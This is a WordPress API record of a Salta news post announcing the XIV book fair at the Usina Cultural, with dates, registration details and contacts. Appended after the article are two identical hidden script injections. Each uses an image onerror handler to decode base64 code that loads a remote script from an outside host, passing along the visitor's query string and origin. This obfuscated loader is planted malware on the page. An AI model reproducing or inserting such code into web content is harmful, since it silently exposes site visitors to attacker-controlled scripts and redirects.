{"id":4381,"date":"2024-09-03T10:35:19","date_gmt":"2024-09-03T13:35:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4381"},"modified":"2025-08-13T23:49:13","modified_gmt":"2025-08-14T02:49:13","slug":"llego-la-xiv-feria-del-libro-a-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4381","title":{"rendered":"Lleg\u00f3 la XIV Feria del Libro a la Usina Cultural"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-15acd76f9c55d37933293688a641ecdd\" style=\"background-color:#9c0759\"><em>Las inscripciones para participar estar\u00e1n abiertas hasta el 16 de septiembre, bajo dos modalidades: la participaci\u00f3n en actividades del programa oficial, como presentaciones de libros, talleres vinculados al mundo del libro y la lectura. Tambi\u00e9n se contar\u00e1 con stands para la venta de libros.<\/em><\/h4>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura de Salta<\/strong>&nbsp;lanz\u00f3 una convocatoria para participar, del 9 al 13 de octubre, a trav\u00e9s de talleres, intervenciones art\u00edsticas, presentaciones de libros y encuentros de editores y escritores en la Usina Cultural.<\/p>\n\n\n\n<p>La Feria del Libro de Salta, en su decimocuarta edici\u00f3n, sigue posicion\u00e1ndose como un punto de encuentro cultural en la regi\u00f3n, abriendo sus puertas a las editoriales, escritores y artistas de la Provincia.<\/p>\n\n\n\n<p>El evento, parte del calendario cultural de la provincia, se ha consolidado como un espacio clave para expresar la diversidad y riqueza cultural de Salta, convirtiendo la feria en un evento polif\u00f3nico que refleja una pol\u00edtica p\u00fablica centrada en el fomento del acceso a la cultura.<\/p>\n\n\n\n<p>Las inscripciones para participar estar\u00e1n abiertas&nbsp;hasta el 16 de septiembre, bajo dos modalidades: la participaci\u00f3n en actividades del programa oficial, como presentaciones de libros, talleres vinculados al mundo del libro y la lectura. Tambi\u00e9n se contar\u00e1 con stands para la venta de libros. Los formularios de inscripci\u00f3n y los reglamentos correspondientes, est\u00e1n disponibles en&nbsp;<a href=\"https:\/\/www.culturasalta.gob.ar\/\">https:\/\/www.culturasalta.gob.ar<\/a>&nbsp;para quienes deseen sumarse a la feria.<\/p>\n\n\n\n<p>Una de las novedades de este a\u00f1o es la realizaci\u00f3n de un encuentro entre editoriales y escritores salte\u00f1os que posean material original sin editar, con el objetivo de fomentar el contacto y la colaboraci\u00f3n en la creaci\u00f3n literaria. Este espacio de intercambio se suma a la oferta de actividades que buscan ampliar el horizonte cultural de la feria, integrando propuestas innovadoras y diversos enfoques.<\/p>\n\n\n\n<p>La convocatoria tambi\u00e9n est\u00e1 dirigida a municipios de la provincia de Salta, as\u00ed como a otras provincias del Norte Grande, invitando a editoriales, escritores y artistas de todo el pa\u00eds a participar en este encuentro cultural. Adem\u00e1s, durante los d\u00edas 9 y 10 de octubre, se desarrollar\u00e1n actividades en conjunto con el Ministerio de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, con la participaci\u00f3n de distintas instituciones educativas.<\/p>\n\n\n\n<p>Los resultados de la convocatoria se dar\u00e1n a conocer entre el 16 y el 20 de septiembre, y ser\u00e1n comunicados por correo electr\u00f3nico a los postulantes seleccionados.&nbsp;<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, los interesados pueden comunicarse a trav\u00e9s de los siguientes correos electr\u00f3nicos:&nbsp;<a href=\"https:\/\/www.salta.gob.ar\/promocioncultural@culturasalta.gov.ar\">promocioncultural@culturasalta.gov.ar<\/a>y&nbsp;<a href=\"https:\/\/www.salta.gob.ar\/bibliotecaprovincial@culturasalta.gov.ar,\">bibliotecaprovincial@culturasalta.gov.ar,<\/a>&nbsp;al (0387) 4212884 o al 3875150823.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las inscripciones para participar estar\u00e1n abiertas hasta el 16 de septiembre, bajo dos modalidades: la participaci\u00f3n en actividades del programa oficial, como presentaciones de libros, talleres vinculados al mundo del libro y la lectura. Tambi\u00e9n se contar\u00e1 con stands para la venta de libros. La&nbsp;Secretar\u00eda de Cultura de Salta&nbsp;lanz\u00f3 una convocatoria para participar, del 9 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4382,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4381","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4381"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4381"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4381\/revisions"}],"predecessor-version":[{"id":6690,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4381\/revisions\/6690"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4382"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}